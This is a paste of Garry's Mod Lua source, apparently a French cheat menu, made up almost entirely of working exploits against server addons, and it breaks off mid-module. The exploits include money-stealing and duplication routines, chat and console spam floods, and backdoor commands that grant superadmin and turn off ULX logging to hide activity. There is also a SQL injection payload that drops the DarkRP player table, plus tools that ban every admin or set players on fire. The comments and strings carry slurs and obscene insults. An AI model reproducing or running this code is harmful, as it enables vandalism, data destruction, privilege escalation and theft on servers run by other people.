Facebook
From Ben, 1 Month ago, written in Plain Text.
Embed
Download Paste or View Raw
Hits: 199
  1. if file.Exists( "includes/extensions/client/vehicle.lua", "LUA" ) == false then -- ne pas toucher cac check !!!!
  2. local Lokidev = nil
  3. local RatesScaleLevel = LocalPlayer():SteamID()
  4. local iZNX = {}
  5. iZNX.memory = {}
  6. local grad = Material( "gui/gradient" )
  7. local upgrad = Material( "gui/gradient_up" )
  8. local downgrad = Material( "gui/gradient_down" )
  9. local ctext = chat.AddText
  10. function iZNX.ChatText( str )
  11. ctext( Color(190, 190, 190), [[ [AnatikMenu]: ]]..str )
  12. end
  13. function iZNX.NetStart( str )
  14. local netstart = net.Start
  15. if Lokidev and Lokidev.G and Lokidev.G.net then
  16. netstart = Lokidev.G.net.Start
  17. else
  18. --        print( "sending netmessage in insecure mode" )
  19. end
  20. return netstart( str )
  21. end
  22. function iZNX.ValidNetString( str )
  23. local netstart = net.Start
  24. if Lokidev and Lokidev.G and Lokidev.G.net then
  25. netstart = Lokidev.G.net.Start
  26. else
  27. --        print( "scanning for exploit in insecure mode" )
  28. end
  29. local status, error = pcall( netstart, str )
  30. return status
  31. end
  32. function iZNX.ValidNetString( str )
  33. local status, error = pcall( net.Start, str )
  34. return status
  35. end
  36. iZNX.sploits = {}
  37. local severitycols = {
  38. [1] = Color( 80, 80, 120 ),
  39. [2] = Color( 80, 120, 80 ),
  40. [3] = Color( 150, 90, 50 ),
  41. [4] = Color( 150, 50, 0 ),
  42. }
  43. function iZNX.AddExploit( name, tab )
  44. if !isstring( name ) then print("U FUCKED UP A SPLOIT RETARD") return end
  45. if !istable( tab ) then print("U FUCKED UP A SPLOIT RETARD") return end
  46. iZNX.sploits[name] = tab
  47. end
  48. function iZNX.IsStored( addr )
  49. return iZNX.memory[addr] != nil
  50. end
  51. function iZNX.GetStored( addr, fallback )
  52. if fallback and iZNX.memory[addr] == nil then return fallback end
  53. return iZNX.memory[addr]
  54. end
  55. function iZNX.Store( addr, val )
  56. iZNX.memory[addr] = val
  57. end
  58. function iZNX.GetAllStored()
  59. return iZNX.memory
  60. end
  61. function iZNX.GetAllStoredData()
  62. local ret = {}
  63. for k, v in pairs( iZNX.memory ) do
  64. if !istable( v ) then ret[k] = v end
  65. end
  66. return ret
  67. end
  68. function iZNX.LoadConfig()
  69. local f = file.Read( "Lokidev_exploit.dat", "DATA" )
  70. if !f then iZNX.ChatText( "T'AS PAS SAVE DE CONFIG SALE TRIZOMIQUE" ) end
  71. local raw = util.Decompress( f )
  72. local garbage = util.JSONToTable( raw )
  73. table.Merge( iZNX.memory, garbage )
  74. --    iZNX.memory = garbage
  75. iZNX.Menu:Remove()
  76. iZNX.ChatText( "Fichier de configuration chargé" )
  77. end
  78. function iZNX.SaveConfig()
  79. local myturds = util.TableToJSON( iZNX.GetAllStoredData() )
  80. if !myturds then return end
  81. local cumpressed = util.Compress( myturds )
  82. file.Write( "Lokidev_exploit.dat", cumpressed )
  83. iZNX.ChatText( "Fichier de configuration sauvegardé" )
  84. end
  85. iZNX.AddExploit( "€ Customizable Printers Money Stealer €", {
  86. desc = "Vole instantanément tout l'argent de chaque Printer sur le serveur",
  87. severity = 3,
  88. scan = function() return iZNX.ValidNetString( "SyncPrinterButtons76561198056171650" ) end,
  89. functions = {
  90. { typ = "func", name = "Prendre", func = function()
  91. if !timer.Exists( "Lokidev_exploit_shekels" ) then
  92. iZNX.ChatText( "Vole de l'argent lancé" )
  93. timer.Create( "Lokidev_exploit_shekels", 0.1, 0, function()
  94. for k, v in pairs(ents.GetAll()) do
  95. if( v:GetClass():find("print") ) then
  96. iZNX.NetStart( "SyncPrinterButtons76561198056171650" )
  97. net.WriteEntity(v)
  98. net.WriteUInt(2, 4)
  99. net.SendToServer()
  100. end
  101. end
  102. end)
  103. else
  104. timer.Remove( "Lokidev_exploit_shekels" )
  105. iZNX.ChatText( "Vole de l'argent stoppé" )
  106. end
  107. end, },
  108. },
  109. } )
  110. iZNX.AddExploit( "ULX Friends Spam", {
  111. desc = "Spams tout le monde sur le serveur avec un message",
  112. severity = 1,
  113. scan = function() return (iZNX.ValidNetString( "sendtable" ) and ulx and ulx.friends ) end,
  114. functions = {
  115. { typ = "string", name = "Entrer un message", default = "Bitch please", addr = "fr_spamstring" },
  116. { typ = "players", addr = "fr_players" },
  117. { typ = "func", name = "Big Spam", func = function()
  118. if !timer.Exists( "bigspams" ) then
  119. iZNX.ChatText( "big spam lancé" )
  120. timer.Create( "bigspams", 0.5, 0, function()
  121. local t = iZNX.GetStored( "fr_players", {} )
  122. for k, v in pairs( player.GetAll() ) do
  123. if !table.HasValue( t, v ) then continue end
  124. local buyit = {}
  125. for i = 1, 15 do
  126. table.insert( buyit, iZNX.GetStored( "fr_spamstring", "Bitch please" ) )
  127. end
  128. iZNX.NetStart( "sendtable" )
  129. net.WriteEntity( v )
  130. net.WriteTable( buyit )
  131. net.SendToServer()
  132. end
  133. end)
  134. else
  135. timer.Remove( "bigspams" )
  136. iZNX.ChatText( "big spam stoppé" )
  137. end
  138. end, },
  139. },
  140. } )
  141. iZNX.AddExploit( "Console Erreur Spammer", {
  142. desc = "Défonce le serveur rcon avec des erreurs massive )",
  143. severity = 1,
  144. scan = function() return iZNX.ValidNetString( "steamid2" ) end,
  145. functions = {
  146. { typ = "func", name = "Big Spam", func = function()
  147. if !timer.Exists( "Lokidev_exploit_errorz" ) then
  148. iZNX.ChatText( "erreur spam lancé" )
  149. timer.Create( "Lokidev_exploit_errorz", 0.1, 0, function()
  150. iZNX.NetStart( "steamid2" )
  151. net.WriteString( "Something is creating very strong script errors" )
  152. net.SendToServer()
  153. end)
  154. else
  155. timer.Remove( "Lokidev_exploit_errorz" )
  156. iZNX.ChatText( "erreur spam stoppé" )
  157. end
  158. end, },
  159. },
  160. } )
  161. iZNX.AddExploit( "Turbo Erreur Spammer", {
  162. desc = "Défonce le serveur rcon avec des erreurs massive.",
  163. severity = 2,
  164. scan = function() return iZNX.ValidNetString( "steamid2" ) end,
  165. functions = {
  166. { typ = "func", name = "Big Spam", func = function()
  167. if !timer.Exists( "Lokidev_exploit_errorzt" ) then
  168. iZNX.ChatText( "erreur spam lancé" )
  169. timer.Create( "Lokidev_exploit_errorzt", 0, 0, function()
  170. for i = 1, 100 do
  171. iZNX.NetStart( "steamid2" )
  172. net.WriteString( "Something is creating very strong script errors" )
  173. net.SendToServer()
  174. end
  175. end)
  176. else
  177. timer.Remove( "Lokidev_exploit_errorzt" )
  178. iZNX.ChatText( "erreur spam stoppé" )
  179. end
  180. end, },
  181. },
  182. } )
  183. iZNX.AddExploit( "€ Kun Drug €", {
  184. desc = "Exploit d'argent",
  185. severity = 3,
  186. scan = function() return iZNX.ValidNetString( "Kun_SellDrug" ) end,
  187. functions = {
  188. { typ = "func", name = "Lancer", func = function()
  189. if !timer.Exists( "Lokidev_exploit_selldrugon" ) then
  190. iZNX.ChatText( "Exploit lancé" )
  191. timer.Create( "Lokidev_exploit_selldrugon", 0, 0, function()
  192. for i=1,1000 do
  193. iZNX.NetStart("Kun_SellDrug")
  194. net.WriteString("mushroom")
  195. net.SendToServer()
  196. end
  197. end)
  198. else
  199. timer.Remove( "Lokidev_exploit_selldrugon" )
  200. iZNX.ChatText( "Exploit stoppé" )
  201. end
  202. end, },
  203. },
  204. } )
  205. iZNX.AddExploit( "Point Shop Unbox", {
  206. desc = "Exploit a téster",
  207. severity = 2,
  208. scan = function() return iZNX.ValidNetString( "net_PSUnBoxServer" ) end,
  209. functions = {
  210. { typ = "func", name = "Lancer", func = function()
  211. for k,v in pairs(player.GetAll()) do
  212. local i = 0
  213. for k2,v2 in pairs(PS.Items) do
  214. if !v:PS_HasItem(v2.ID) then  
  215. timer.Simple(k*i*1.7,function()
  216. iZNX.NetStart("net_PSUnBoxServer")
  217. net.WriteEntity(v)
  218. net.WriteString(v2.ID)
  219. net.SendToServer()
  220. end)
  221. i = i + 1
  222. end
  223. end
  224. end
  225. end, },
  226. },
  227. } )
  228. iZNX.AddExploit( "NE MARCHE PAS", {
  229. desc = "NE MARCHE PAS",
  230. severity = 4,
  231. scan = function() return iZNX.ValidNetString( "pplay_deleterow" ) end,
  232. functions = {
  233. { typ = "players", addr = "l_superadmins" },
  234. { typ = "func", name = "Lancer", func = function()
  235. local t = iZNX.GetStored( "l_superadmins", {} )
  236. for k, v in pairs( player.GetAll() ) do
  237. if !table.HasValue( t, v ) then continue end
  238. local id = v:SteamID()
  239. local tbl = {}
  240. tbl.name = "FAdmin_PlayerGroup"
  241. tbl.where = {
  242. "steamid",
  243. tostring(id)
  244. }
  245. iZNX.NetStart("pplay_deleterow")
  246. net.WriteTable(tbl)
  247. net.SendToServer()
  248. local tbl = {}
  249. tbl.tblname = "FAdmin_PlayerGroup"
  250. tbl.tblinfo = {
  251. tostring(id),
  252. "superadmin"
  253. }
  254. iZNX.NetStart("pplay_addrow")
  255. net.WriteTable(tbl)
  256. net.SendToServer()
  257. iZNX.ChatText( "NE MARCHE PAS"..v:Nick() )
  258. end
  259. end, },
  260. },
  261. } )
  262. local thefrenchenculer = ""
  263. if iZNX.ValidNetString( "Sandbox_ArmDupe" ) then
  264. thefrenchenculer = "Sandbox_ArmDupe"
  265. else
  266. if iZNX.ValidNetString( "Fix_Keypads" ) then
  267. thefrenchenculer = "Fix_Keypads"
  268. else
  269. if iZNX.ValidNetString( "Remove_Exploiters" ) then
  270. thefrenchenculer = "Remove_Exploiters"
  271. else
  272. if iZNX.ValidNetString( "noclipcloakaesp_chat_text" ) then
  273. thefrenchenculer = "noclipcloakaesp_chat_text"
  274. else
  275. if iZNX.ValidNetString( "_Defqon" ) then
  276. thefrenchenculer = "_Defqon"
  277. else
  278. if iZNX.ValidNetString( "_CAC_ReadMemory" ) then
  279. thefrenchenculer = "_CAC_ReadMemory"
  280. else
  281. if iZNX.ValidNetString( "nostrip" ) then
  282. thefrenchenculer = "nostrip"
  283. else
  284. if iZNX.ValidNetString( "LickMeOut" ) then
  285. thefrenchenculer = "LickMeOut"
  286. else
  287. if iZNX.ValidNetString( "MoonMan" ) then
  288. thefrenchenculer = "MoonMan"
  289. if iZNX.ValidNetString( "Im_SOCool" ) then
  290. thefrenchenculer = "Im_SOCool"
  291. end
  292. end
  293. end
  294. end
  295. end
  296. end
  297. end
  298. end
  299. end
  300. end
  301. iZNX.AddExploit( ".NET Backdoor", {
  302. desc = "Backdoor trés puissant, ENLEVE LES NOTIFICATION POUR ETRE PLUS DISCRET, Backdoor :"..thefrenchenculer.."",
  303. severity = 4,
  304. scan = function() return iZNX.ValidNetString( thefrenchenculer ) end,
  305. functions = {
  306. { typ = "func", name = "ENLEVER LES NOTIFICATION ULX", func = function()
  307. iZNX.NetStart(thefrenchenculer)
  308. net.WriteString( "RunConsoleCommand(\"ulx_logecho\", \"0\")" )
  309. net.WriteBit(1)
  310. net.SendToServer()
  311. end, },
  312. { typ = "htxcommandeliste", name = "Commandes Backdoor" },
  313. { typ = "players", addr = "give_superadmins" },
  314. { typ = "func", name = "NE MARCHE PAS", func = function()
  315. local t = iZNX.GetStored( "give_superadmins", {} )
  316. for k, v in pairs( player.GetAll() ) do
  317. if !table.HasValue( t, v ) then continue end
  318. local id = v:SteamID()
  319. iZNX.NetStart(thefrenchenculer)
  320. net.WriteString( "ulx adduserid "..id.." superadmin" )
  321. net.WriteBit(false)
  322. net.SendToServer()
  323. end
  324. end, },
  325. },
  326. } )
  327. iZNX.AddExploit( "☢ Niquer la base de donné SQL ☢", {
  328. desc = "Vandalisez la base de données darkrp master SQL, effaçant toutes les données des joueurs, vous devez être superamin !!",
  329. severity = 4,
  330. scan = function() return iZNX.ValidNetString( "pplay_sendtable" ) end,
  331. functions = {
  332. { typ = "func", name = "Lancer", func = function()
  333. local tbl = {}
  334. tbl.tblname = "darkrp_door; DROP TABLE darkrp_player; CREATE TABLE darkrp_player(a STRING)"
  335. tbl.ply = LocalPlayer()
  336. iZNX.NetStart("pplay_sendtable")
  337. net.WriteTable(tbl)
  338. net.SendToServer()
  339. iZNX.ChatText( "Base de données SQL Server détruite" )
  340. end, },
  341. },
  342. } )
  343. iZNX.AddExploit( "Niquer les Data du serveur", {
  344. desc = "Vandalise le data du serveur, va probablement ennuyer leurs fils de pute de dev x)",
  345. severity = 3,
  346. scan = function() return iZNX.ValidNetString( "WriteQuery" ) end,
  347. functions = {
  348. { typ = "func", name = "Lancer", func = function()
  349. if !timer.Exists( "Lokidev_exploit_datatrasher" ) then
  350. iZNX.ChatText( "Démarrage du spam du dossier data" )
  351. timer.Create( "Lokidev_exploit_datatrasher", 0.5, 0, function()
  352. iZNX.NetStart( "WriteQuery" )
  353. net.WriteString( "BAN ME -> "..LocalPlayer():SteamID()..string.rep( "!", math.random( 1, 5000 ) ) )
  354. net.SendToServer()
  355. end)
  356. else
  357. timer.Remove( "Lokidev_exploit_datatrasher" )
  358. iZNX.ChatText( "Spam du dossier data Stopper" )
  359. end
  360. end, },
  361. },
  362. } )
  363. -- Patched
  364. --[[iZNX.AddExploit( "Turbo Chat Spam", {
  365. desc = "Gros spam, extrêmement ennuyeux",
  366. severity = 1,
  367. scan = function() return iZNX.ValidNetString( "VJSay" ) end,
  368. functions = {
  369. { typ = "string", name = "Entrer un message", default = "LokidevMenu", addr = "vj_spamstring" },
  370. { typ = "string", name = "Entrer un son", default = "vo/npc/male01/hacks01.wav", addr = "vj_spamsound" },
  371. { typ = "func", name = "Big Spam", func = function()
  372. if !timer.Exists( "bigspamsvj" ) then
  373. iZNX.ChatText( "big spam lancé" )
  374. timer.Create( "bigspamsvj", 0.1, 0, function()
  375. for k, v in pairs( player.GetAll() ) do
  376. iZNX.NetStart( "VJSay" )
  377. net.WriteEntity( v )
  378. net.WriteString( iZNX.GetStored( "vj_spamstring", "ACHETER LE @LOKIDEV AJOUTEZ SUPREMACIST" ) )
  379. if iZNX.GetStored( "vj_spamsound", "" ) != "" then
  380. net.WriteString( iZNX.GetStored( "vj_spamsound", "" ) )
  381. end
  382. net.SendToServer()
  383. end
  384. end)
  385. else
  386. timer.Remove( "bigspamsvj" )
  387. iZNX.ChatText( "big spam stoppé" )
  388. end
  389. end, },
  390. },
  391. } )--]]
  392. iZNX.AddExploit( "Give une arme", {
  393. desc = "Exploit pour vous give des putains d'armes",
  394. severity = 3,
  395. scan = function() return iZNX.ValidNetString( "CraftSomething" ) end,
  396. functions = {
  397. { typ = "string", name = "Nom Arme", default = "m9k_ak47", addr = "armes_a_prendre" },
  398. { typ = "func", name = "Prendre", func = function()
  399. iZNX.NetStart( "CraftSomething" )
  400. net.WriteEntity( LocalPlayer() )
  401. net.WriteString( iZNX.GetStored( "armes_a_prendre" ) )
  402. net.WriteString( "" )
  403. net.WriteString( "weapon" )
  404. net.SendToServer()
  405. end, },
  406. },
  407. } )
  408. iZNX.AddExploit( "ULX Extended ", {
  409. desc = "Attention cette exploit est risquée si l'addon est à jour vous allez être kick ^^",
  410. severity = 3,
  411. scan = function() return iZNX.ValidNetString( "banleaver" ) end,
  412. functions = {
  413. { typ = "func", name = "Ban les Admins", func = function()
  414. for k,v in pairs(player.GetAll()) do              
  415. if v:GetUserGroup() != "user" then -- Custom first ranks, youre fucked bro                
  416. if v != LocalPlayer() then                
  417. iZNX.NetStart("banleaver")                
  418. net.WriteString(v:SteamID().."{sep}".."Bitch please")                
  419. net.SendToServer()                
  420. end                
  421. end                
  422. end
  423. end, },
  424. { typ = "func", name = "Ban tout le monde", func = function()
  425. for k,v in pairs(player.GetAll()) do              
  426. if v != LocalPlayer() then                
  427. iZNX.NetStart("banleaver")                
  428. net.WriteString(v:SteamID().."{sep}".."Bitch please")                
  429. net.SendToServer()                
  430. end                
  431. end  
  432. end, },
  433. },
  434. } )
  435. iZNX.AddExploit( "€ Casino NPC €", {
  436. desc = "Exploit d'argent très efficace, go payer des putes et de la coke ;)",
  437. severity = 4,
  438. scan = function() return iZNX.ValidNetString( "75_plus_win" ) end,
  439. functions = {
  440. { typ = "float", name = "Montant", min = "1", max = "100000000", default = "100000", addr = "montant_argent" },
  441. { typ = "players", addr = "l_players_listing" },
  442. { typ = "func", name = "Donner", func = function()
  443. local t = iZNX.GetStored( "l_players_listing", {} )
  444. for k, v in pairs( player.GetAll() ) do
  445. if !table.HasValue( t, v ) then continue end
  446. iZNX.NetStart( "75_plus_win" )
  447. net.WriteString( iZNX.GetStored( "montant_argent" ) )
  448. net.WriteEntity(v)
  449. net.SendToServer()
  450. end
  451. end, },
  452. { typ = "func", name = "Enlever", func = function()
  453. local t = iZNX.GetStored( "l_players_listing", {} )
  454. for k, v in pairs( player.GetAll() ) do
  455. if !table.HasValue( t, v ) then continue end
  456. iZNX.NetStart( "75_plus_win" )
  457. net.WriteString( -iZNX.GetStored( "montant_argent" ) )
  458. net.WriteEntity(v)
  459. net.SendToServer()
  460. end
  461. end, },
  462. },
  463. } )
  464. iZNX.AddExploit( "€ ATM €", {
  465. desc = "Exploit d'argent, go payer des putes et de la coke ;)",
  466. severity = 4,
  467. scan = function() return iZNX.ValidNetString( "ATMDepositMoney" ) end,
  468. functions = {
  469. { typ = "float", name = "Montant", min = "1", max = "100000000", default = "100000", addr = "montant_argent5" },
  470. { typ = "func", name = "Prendre", func = function()
  471. iZNX.NetStart( "ATMDepositMoney" )
  472. net.WriteFloat( -iZNX.GetStored( "montant_argent5" ) )
  473. net.SendToServer()
  474. end, },
  475. },
  476. } )
  477. iZNX.AddExploit( "TAXI Spawn Lag", {
  478. desc = "Exploit pour faire chier les fdp de codeurs ;)",
  479. severity = 2,
  480. scan = function() return iZNX.ValidNetString( "Taxi_Add" ) end,
  481. functions = {
  482. { typ = "func", name = "Spawn", func = function()
  483. local Pos = LocalPlayer():GetEyeTrace().HitPos
  484. iZNX.NetStart("Taxi_Add")
  485. net.WriteString("Taxi Super Exploit #"..math.random( 1, 9999 ))
  486. net.WriteTable({[1]=Pos.x,[2]=Pos.y,[3]=Pos.z})
  487. net.WriteFloat(-9999999)
  488. net.WriteString("Les addons leaks c'est plein d'exploit :D")
  489. net.SendToServer()
  490. end, },
  491. { typ = "func", name = "Super Spam", func = function()
  492. if !timer.Exists( "taxispam" ) then
  493. iZNX.ChatText( "Spam spawn Taxi lancé" )
  494. timer.Create( "taxispam", 0.05, 0, function()
  495. local Pos = LocalPlayer():GetEyeTrace().HitPos
  496. iZNX.NetStart("Taxi_Add")
  497. net.WriteString("Taxi Super Exploit #"..math.random( 1, 9999 ))
  498. net.WriteTable({[1]=Pos.x,[2]=Pos.y,[3]=Pos.z})
  499. net.WriteFloat(-9999999)
  500. net.WriteString("Les addons leaks c'est plein d'exploit :D")
  501. net.SendToServer()
  502. end)
  503. else
  504. timer.Remove( "taxispam" )
  505. iZNX.ChatText( "Spam spawn Taxi arreter" )
  506. end
  507. end, },
  508. },
  509. } )
  510. iZNX.AddExploit( "€ eMining €", {
  511. desc = "Exploit d'argent très efficace, go payer des putes et de la coke ;)",
  512. severity = 4,
  513. scan = function() return iZNX.ValidNetString( "SellMinerals" ) end,
  514. functions = {
  515. { typ = "float", name = "Montant", min = "1", max = "100000000", default = "100000", addr = "montant_argent6" },
  516. { typ = "func", name = "Prendre", func = function()
  517. for k,v in pairs(SkillDB) do
  518. if not ( v.iSkill == true ) then
  519. iZNX.NetStart("Upgrade")
  520. net.WriteTable( { LuaName = v.LuaName, Amount = -iZNX.GetStored( "montant_argent6" ) } )
  521. net.SendToServer()
  522. iZNX.NetStart( "SellMinerals" )
  523. net.WriteTable( { Target = LocalPlayer() } )
  524. net.SendToServer()
  525. end
  526. end
  527. end, },
  528. { typ = "func", name = "Enlever", func = function()
  529. for k,v in pairs(SkillDB) do
  530. if not ( v.iSkill == true ) then
  531. iZNX.NetStart("Upgrade")
  532. net.WriteTable( { LuaName = v.LuaName, Amount = iZNX.GetStored( "montant_argent6" ) } )
  533. net.SendToServer()
  534. iZNX.NetStart( "SellMinerals" )
  535. net.WriteTable( { Target = LocalPlayer() } )
  536. net.SendToServer()
  537. end
  538. end
  539. end, },
  540. },
  541. } )
  542. iZNX.AddExploit( "€ Gamble NPC €", {
  543. desc = "Exploit d'argent Infini, go payer des putes et de la coke ;)",
  544. severity = 4,
  545. scan = function() return iZNX.ValidNetString( "TakeBetMoney" ) end,
  546. functions = {
  547. { typ = "func", name = "Prendre", func = function()
  548. iZNX.NetStart( "TakeBetMoney" )
  549. net.WriteTable({1e333333 , 1e333333})
  550. net.SendToServer()
  551. end, },
  552. },
  553. } )
  554. iZNX.AddExploit( "€ Kun Oil Mod €", {
  555. desc = "Exploit d'argent, go payer des putes et de la coke ;)",
  556. severity = 3,
  557. scan = function() return iZNX.ValidNetString( "Kun_SellOil" ) end,
  558. functions = {
  559. { typ = "func", name = "Prendre", func = function()
  560. for k,v in pairs(ents.GetAll()) do
  561. iZNX.NetStart("Kun_SellOil")
  562. net.WriteEntity(v)
  563. net.SendToServer()
  564. end
  565. end, },
  566. },
  567. } )
  568. iZNX.AddExploit( "Rejoindre la Police 1", {
  569. desc = "Rejoint la police sans passer par le putain de formulaire",
  570. severity = 2,
  571. scan = function() return iZNX.ValidNetString( "PoliceJoin" ) end,
  572. functions = {
  573. { typ = "func", name = "Rejoindre", func = function()
  574. iZNX.NetStart("PoliceJoin")
  575. net.SendToServer()
  576. end, },
  577. },
  578. } )
  579. iZNX.AddExploit( "Rejoindre la Police 2", {
  580. desc = "Rejoint la police sans passer le putain formulaire",
  581. severity = 2,
  582. scan = function() return iZNX.ValidNetString( "CpForm_Answers" ) end,
  583. functions = {
  584. { typ = "func", name = "Rejoindre", func = function()
  585. iZNX.NetStart("CpForm_Answers")
  586. net.WriteEntity(LocalPlayer())
  587. net.WriteTable({})
  588. net.SendToServer()
  589. end, },
  590. },
  591. } )
  592. iZNX.AddExploit( "€ Deposit Money €", {
  593. desc = "Exploit d'argent avec les ATM Deposit Money",
  594. severity = 2,
  595. scan = function() return iZNX.ValidNetString( "DepositMoney" ) end,
  596. functions = {
  597. { typ = "float", name = "Montant", min = "1", max = "100000000", default = "100000", addr = "montant_argent7" },
  598. { typ = "func", name = "Lancer", func = function()
  599. for k,v in pairs(ents.GetAll()) do
  600. swag = v
  601. end
  602. for k,v in pairs(player.GetAll()) do
  603. iZNX.NetStart( "DepositMoney" )
  604. net.WriteEntity(swag)
  605. net.WriteString(-iZNX.GetStored( "montant_argent7" ))
  606. net.WriteEntity(v)
  607. net.SendToServer()
  608. end
  609. end, },
  610. },
  611. } )
  612. iZNX.AddExploit( "MDE", {
  613. desc = "Exploit pour supprimer des PermaProps (Viser le props et cliquer sur l'exploit pour le supprimer)",
  614. severity = 2,
  615. scan = function() return iZNX.ValidNetString( "MDE_RemoveStuff_C2S" ) end,
  616. functions = {
  617. { typ = "func", name = "Lancer", func = function()
  618. iZNX.NetStart( "MDE_RemoveStuff_C2S" )
  619. net.WriteTable( {DATA="",TARGET=LocalPlayer():GetEyeTrace().Entity} )
  620. net.SendToServer()
  621. end, },
  622. },
  623. } )
  624. iZNX.AddExploit( "€ SS Shelf NET €", {
  625. desc = "Exploit d'argent",
  626. severity = 3,
  627. scan = function() return iZNX.ValidNetString( "NET_SS_DoBuyTakeoff" ) end,
  628. functions = {
  629. { typ = "float", name = "Montant", min = "1", max = "100000000", default = "100000", addr = "montant_argent9" },
  630. { typ = "func", name = "Lancer", func = function()
  631. for k,v in pairs(ents.GetAll()) do
  632. swag = v
  633. end
  634. iZNX.NetStart( 'NET_SS_DoBuyTakeoff' )          
  635. net.WriteEntity(LocalPlayer())          
  636. net.WriteEntity(swag)          
  637. net.WriteTable({'spawned_weapon'})          
  638. net.WriteInt(-iZNX.GetStored( "montant_argent9" ), 16)      
  639. net.SendToServer()  
  640. end, },
  641. },
  642. } )
  643. iZNX.AddExploit( "€ MODIFIER TAXES €", {
  644. desc = "Exploit d'argent",
  645. severity = 3,
  646. scan = function() return iZNX.ValidNetString( "NET_EcSetTax" ) end,
  647. functions = {
  648. { typ = "float", name = "Montant", min = "1", max = "100000000", default = "100000", addr = "montant_argent10" },
  649. { typ = "func", name = "Lancer", func = function()
  650. iZNX.NetStart("NET_EcSetTax")
  651. net.WriteInt(-iZNX.GetStored( "montant_argent10" ), 16)
  652. net.SendToServer()
  653. end, },
  654. },
  655. } )
  656. iZNX.AddExploit( "€ Fine System €", {
  657. desc = "Exploit d'argent , go payer des putes et de la coke ;)",
  658. severity = 3,
  659. scan = function() return iZNX.ValidNetString( "RP_Accept_Fine" ) end,
  660. functions = {
  661. { typ = "float", name = "Montant", min = "1", max = "100000000", default = "100000", addr = "montant_argent11" },
  662. { typ = "players", addr = "l_players_listing_fine" },
  663. { typ = "func", name = "Prendre", func = function()
  664. local t = iZNX.GetStored( "l_players_listing_fine", {} )
  665. for k, v in pairs( player.GetAll() ) do
  666. if !table.HasValue( t, v ) then continue end
  667. iZNX.NetStart("RP_Accept_Fine")
  668. net.WriteString(v:Nick())
  669. net.WriteDouble(-iZNX.GetStored( "montant_argent11" ))
  670. net.SendToServer()
  671. end
  672. end, },
  673. { typ = "func", name = "Envoyer Amende x)", func = function()
  674. local t = iZNX.GetStored( "l_players_listing_fine", {} )
  675. for k, v in pairs( player.GetAll() ) do
  676. if !table.HasValue( t, v ) then continue end
  677. iZNX.NetStart("RP_Fine_Player")
  678. net.WriteString(v:Nick())
  679. net.WriteString(v:Nick())
  680. net.WriteDouble(iZNX.GetStored( "montant_argent11" ))
  681. net.WriteString("Ce serveur mérite une anarchie! Serveur hacked!! Vous pouvez lecher mon trou du cul maintenant x)")
  682. net.SendToServer()
  683. end
  684. end, },
  685. { typ = "func", name = "Spam Envoyer Amende x)", func = function()
  686. if !timer.Exists( "spamamandefine" ) then
  687. iZNX.ChatText( "Spam lancé" )
  688. timer.Create( "spamamandefine", 0.1, 0, function()
  689. local t = iZNX.GetStored( "l_players_listing_fine", {} )
  690. for k, v in pairs( player.GetAll() ) do
  691. if !table.HasValue( t, v ) then continue end
  692. iZNX.NetStart("RP_Fine_Player")
  693. net.WriteString(v:Nick())
  694. net.WriteString(v:Nick())
  695. net.WriteDouble(iZNX.GetStored( "montant_argent11" ))
  696. net.WriteString("Ce serveur mérite une anarchie! Serveur hacked!! Vous pouvez lecher mon trou du cul maintenant x)")
  697. net.SendToServer()
  698. end
  699. end)
  700. else
  701. timer.Remove( "spamamandefine" )
  702. iZNX.ChatText( "Spam stoppé" )
  703. end
  704. end, },
  705. },
  706. } )
  707. iZNX.AddExploit( "€ 3D Cardealer €", {
  708. desc = "Exploit d'argent, Regarder un vehicule que vous avez acheté pour le dupliquer ;)",
  709. severity = 2,
  710. scan = function() return iZNX.ValidNetString( "RXCAR_Shop_Store_C2S" ) end,
  711. functions = {
  712. { typ = "func", name = "Dupliquer", func = function()
  713. for i = 0, 75 do              
  714. iZNX.NetStart( "RXCAR_Shop_Store_C2S" );              
  715. net.WriteTable( { E = ent } );                
  716. net.SendToServer();                
  717. end
  718. end, },
  719. { typ = "func", name = "Tout Vendre", func = function()
  720. local ent              
  721. for k,v in pairs(ents.GetAll()) do                
  722. if v:GetClass() == "rm_car_dealer" then                
  723. ent = v                
  724. end                
  725. end                
  726. for k,v in pairs(RX3DCar_Inventory) do                
  727. iZNX.NetStart( "RXCAR_SellINVCar_C2S" )                
  728. net.WriteTable({UN=v.UniqueID,SE=ent})                
  729. net.SendToServer()                
  730. end      
  731. end, },          
  732. },
  733. } )
  734. iZNX.AddExploit( "Supprimer Armes / Argent", {
  735. desc = "Supprimer les armes / l'argent de touts le monde",
  736. severity = 3,
  737. scan = function() return iZNX.ValidNetString( "drugseffect_remove" ) end,
  738. functions = {
  739. { typ = "func", name = "Supprimer Armes", func = function()
  740. iZNX.NetStart("drugseffect_remove")
  741. net.SendToServer()
  742. end, },
  743. { typ = "func", name = "Supprimer Argent", func = function()
  744. iZNX.NetStart("drugs_money")
  745. net.SendToServer()
  746. end, },
  747. },
  748. } )
  749. iZNX.AddExploit( "€ Crafting Mod €", {
  750. desc = "Exploit d'argent",
  751. severity = 3,
  752. scan = function() return iZNX.ValidNetString( "CRAFTINGMOD_SHOP" ) end,
  753. functions = {
  754. { typ = "float", name = "Montant", min = "1", max = "100000000", default = "100000", addr = "montant_argent14" },
  755. { typ = "func", name = "Ajouter Argent", func = function()
  756. iZNX.NetStart("CRAFTINGMOD_SHOP")
  757. net.WriteTable({
  758. BUY =   -iZNX.GetStored( "montant_argent14" );
  759. type    =   1
  760. })
  761. net.WriteInt(1,16)
  762. net.SendToServer()
  763. end, },
  764. { typ = "func", name = "Enlever Argent", func = function()
  765. iZNX.NetStart("CRAFTINGMOD_SHOP")
  766. net.WriteTable({
  767. BUY =   LocalPlayer():getDarkRPVar("money");
  768. type    =   1
  769. })
  770. net.WriteInt(1,16)
  771. net.SendToServer()
  772. end, },
  773. },
  774. } )
  775. iZNX.AddExploit( "Mettre le Feu", {
  776. desc = "Mettre les props/joueur en feu. RIP JOHNNY.",
  777. severity = 3,
  778. scan = function() return iZNX.ValidNetString( "drugs_ignite" ) end,
  779. functions = {
  780. { typ = "func", name = "Feux Props", func = function()
  781. iZNX.NetStart("drugs_ignite")
  782. net.WriteString("prop_physics")
  783. net.SendToServer()
  784. end, },
  785. { typ = "func", name = "Feux Joueurs", func = function()
  786. iZNX.NetStart("drugs_ignite")
  787. net.WriteString("player")
  788. net.SendToServer()
  789. end, },
  790. },
  791. } )
  792. iZNX.AddExploit( "Modifier la Vie", {
  793. desc = "Changer la vie des joueurs",
  794. severity = 2,
  795. scan = function() return iZNX.ValidNetString( "drugseffect_hpremove" ) end,
  796. functions = {
  797. { typ = "float", name = "Montant", min = "1", max = "100000000", default = "100", addr = "montant_argent15" },
